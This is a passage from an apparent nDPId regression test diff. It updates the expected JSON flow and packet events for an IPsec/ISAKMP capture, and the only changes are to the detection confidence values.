YM3L+cTys\/1ehMTZJ5H7W4D6aDlC48W5lD6y8F+FbS1WvOYVXYyONGexnP1DJD6sMvWK5Q52bNW1EriIYf6I81yfVkjESiMA5ZA+Eq4pQUgDA5GXT7KTHfVx8STidRTLi\/eORWO4h6b0v5dA8dkn"} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946748266345,"pkt":"YDjgxTWgeJS0JASgCABFAADsWI4AAPcRfbdt7bvBwKgCZBGUOKQA2HH\/AAAAAP914hnvOUFtU+t6DQP4cgkuICMgAAAAAQAAAMwkAACwfOu85cuZCUbVuq5wm542UXnESUHvBRNjBca38ma3hqliZsy+G\/\/n62MBVQNpBmYJoZnF09Qmr1Z9AMg5tlsZQg+4xCpY4ssYThUAi8+wYicxcx11cAacOuAlsFrAIcFYRZV3T7KvT4B6PT3kvl+mZX8NHattCE7zkX+uEGW41fimmWlx+QR1iVB7GlSVyjJxXMb2eHWzkhBMoZHUk6vSm+Uwhf0kF6eDJ160Jg=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946748266345,"pkt":"eJS0JASgYDjgxTWgCABFAACMYKRAAD8R7gHAqAJkbe27wTikEZQAeHXnAAAAAP914hnvOUFtU+t6DQP4cgkuICMIAAAAAgAAAGwwAABQsyybA\/pO5Y0NejAqULLQtpl3j4jbOqkLYKooS0R9AlfONoTAuJ23Z4\/\/Qg3tTx3Q2UzJE2YfJf0QtP9cSb3bPqnZCPECcDF2jFD5Kg=="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946748266345,"pkt":"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\/9O+guLX64aMD4yr43miIqE+KQAAJNbeYndsxpRteQJq7FlIdurWEhJnYXNbqT1WPC1KmuqpKQAAHAAAQARb6C2wDaopl+DFj+XmAlY4N5j6CwAAABwAAEAFAoYE8OQWRt3BYjiQBZCwYMlfBHc="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946748266345,"pkt":"YDjgxTWgeJS0JASgCABFAABQlSsAAPcRQbRt7bvDwKgCZAH0KQQAPKW92k5lSF5728QAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAB8LnJU3X9N35FnuMbYiA=="} 01512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946748266345,"pkt":"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\/9O+guLX64aMD4yr43miIqE+KQAAJNbeYndsxpRteQJq7FlIdurWEhJnYXNbqT1WPC1KmuqpKQAAHAAAQARb6C2wDaopl+DFj+XmAlY4N5j6CwAAABwAAEAFAoYE8OQWRt3BYjiQBZCwYMlfBHc="} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946747261671,"flow_last_seen":946748116945,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748298684,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946747261671,"flow_last_seen":946748116945,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748298684,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":127,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":127,"packets-processed":126,"total-skipped-flows":0,"total-l4-payload-len":59936,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":6,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":946748870137} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946748252067,"flow_last_seen":946748871542,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13776,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946748266345,"flow_last_seen":946748870202,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946748252067,"flow_last_seen":946748871542,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13776,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946748266345,"flow_last_seen":946748870202,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":146,"packets-processed":145,"total-skipped-flows":0,"total-l4-payload-len":68780,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":8,"current-active-flows":2,"total-active-flows":6,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":946749778334} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778334,"flow_last_seen":946749778334,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946749778334,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946749778334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946749778334,"pkt":"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\/I3GrOhdR2Ahrzg1cl5K7CGOqmD9LmmvBVQSrauKwYuvsfoAIPoWocHQoMo7f5ymv4IPWL+HbeAEosPePp10VCe7il3eMSwG\/INdrGrGu21qwlO\/+efSCGs3uGrG1SV6gA+E\/oPdzfBUNqf\/aMnkpkFwcKQAAJMgQNb6ePi189Vo1zI09B5mQSHqhnrJrpjWKCSmy16flKQAAHAAAQATK6hMad2HUkIE350RaQYXRyGPbFgAAABwAAEAFiTzfmy4vUiSu\/dsxMvaGgLvptZw="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778334,"flow_last_seen":946749778334,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946749778334,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778334,"flow_last_seen":946749778334,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946749778334,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946749778364,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946749778364,"pkt":"YDjgxTWgeJS0JASgCABFAABQyUgAAPcRDZht7bvCwKgCZAH0KQQAPBQcUUmluBAEMEQAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFVgBk+LvIcxJJoE2awhA=="} 
01517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946749778371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946749778371,"pkt":"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\/I3GrOhdR2Ahrzg1cl5K7CGOqmD9LmmvBVQSrauKwYuvsfoAIPoWocHQoMo7f5ymv4IPWL+HbeAEosPePp10VCe7il3eMSwG\/INdrGrGu21qwlO\/+efSCGs3uGrG1SV6gA+E\/oPdzfBUNqf\/aMnkpkFwcKQAAJMgQNb6ePi189Vo1zI09B5mQSHqhnrJrpjWKCSmy16flKQAAHAAAQATK6hMad2HUkIE350RaQYXRyGPbFgAAABwAAEAFiTzfmy4vUiSu\/dsxMvaGgLvptZw="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778420,"flow_last_seen":946749778420,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946749778420,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946749778420,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946749778420,"pkt":"eJS0JASgYDjgxTWgCABFAANM5zxAAD8RZKjAqAJkbe27wjikEZQDOErMAAAAAFFJpbgQBDBELFuvwAKAaBsuICMIAAAAAQAAAywjAAMQbA4QxmfNSp+fyUaP2skcxjhRyRA+Hy+nulOzx4seP\/VJbGCawiDcrcQc5QWGL3j\/WGmj93yDBSuy1WL7euil8k+L7Lh7IAx\/NEbTgeGj3cL+spCq6ZMgNKlhRmf6z4mQrPD29ZnJmLkBEmRQeomp2qPvmDIKkRMTrB2BfjuJ3YLSygMFLctsI7ggXNYV1Po\/4vPk4vVzDgwRrFqrW7KYrJLiAVN1hDJPr7Gy9kuPluJ8z8o2PofHRbWuScAYE0E+eb21tLzdgXQ3tKXX\/vpC+hFitQfjlOh5t9vsoEgIWNuITZ3lvptM6HOoSsn5dQw+XRBKZuJT7XF1A11+UL3jVX5RITf88G+Q7dv+tP6+TWskvGxDjrTTGXNofiTWyJ0w+3Fdae7fW2ijy34\/AL0iJMLvN1YPXO3N8vN5fGYPpypBTKw4V7xWeo3oBe0ejub4fmsULl2SoNBKg9VDPByKUUYEn50TQzW4BY7Z\/PTxzIQcPmN6aDEGl2ZTA47xO9I\/J4Zg4T43ce7SbxXpZ7f4uRctE9VnCWLMpGoVX9J+gc3pnlcwRtYfvwllyRptZ87skVsrIIvJBqDaL1f+oFz66PltKumOsgL0CivcQ6iqILl0OFgquRDBleUUEodHghaanDd7OmwElgTX2VD7RHoHmm5WDDXo2Tu35iL9ktdUtRy3n9bBpXgD1gXs8xWnOBYEH4muaXHxllxzh3KU+j1o1hssWvMNqfk3+UtFJIb0\/HFa7TC0KgAqPRF8BpMATPvlSferLmQOkCNvtSvw4LYOAPrld3EUDVStRHUbViInYZC1CTA15NkdRyFHZ1Vwqg\/6HJvl5DH8X0N95iuoDd+x3ONBHtR1y6njUd86stH8E\/t9P6ZXKzKVKC8e9b9G+9dCCwrRz4bWQMpH3mV9fTxYCVHXsaZR0xVSrKXIE6kZ\/XrBFCnbPiPXQkJKO4Nwn9bhYgongIZBMSUV9SDtmsnwsaLjW6NEYKhlmP3XJ287IRxrZ+3XDb9CCTOVdttWvgGvN5pdRZKp9jpIxrWW"} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778420,"flow_last_seen":946749778420,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946749778420,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778420,"flow_last_seen":946749778420,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946749778420,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946749778561,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946749778561,"pkt":"YDjgxTWgeJS0JASgCABFAADsydYAAPcRDG5t7bvCwKgCZBGUOKQA2H8VAAAAAFFJpbgQBDBELFuvwAKAaBsuICMgAAAAAQAAAMwkAACw2vKDsI4WvCewQgUoU\/SKrFqCVUiKj1KKiDUx8Cqi9Zwcr5gbr2Mtoeu970bnlX31FD4v\/q7xpGL7dx9OD7xJZhwuc1Igl\/opndPG7\/EbMmU7b4lg00bORCDWSEUicP2p712CNcs8OyaUthH\/WyYO+D2i8bAigrbPmFCDIkhLbGRlEsDsQxrZRbqYVnxjaH3eSWftv0T1TsSVO3fOcXcaUJcQtsMqEfqp4CNimw=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946749779105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946749779105,"pkt":"eJS0JASgYDjgxTWgCABFAACM501AAD8RZ1fAqAJkbe27wjikEZQAeG1BAAAAAFFJpbgQBDBELFuvwAKAaBsuICMIAAAAAgAAAGwwAABQGw+MmDcuV24HZanpawl3j\/i3cSl527taeiNa1LQV32lRXZkxAYiyvhFGbUNbtCFv+dhSQ2oZjW\/ai6sYO041xroOv3SvSK1vPWSgpA=="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":164,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946748252067,"flow_last_seen":946748884718,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13856,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946749779886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":164,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946748266345,"flow_last_seen":946748870202,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946749779886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":164,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946748252067,"flow_last_seen":946748884718,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13856,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946749779886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":164,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946748266345,"flow_last_seen":946748870202,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946749779886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":165,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":165,"packets-processed":164,"total-skipped-flows":0,"total-l4-payload-len":77624,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":8,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":62,"global_ts_msec":946750800427} -00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":184,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946749778420,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":946750802633,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 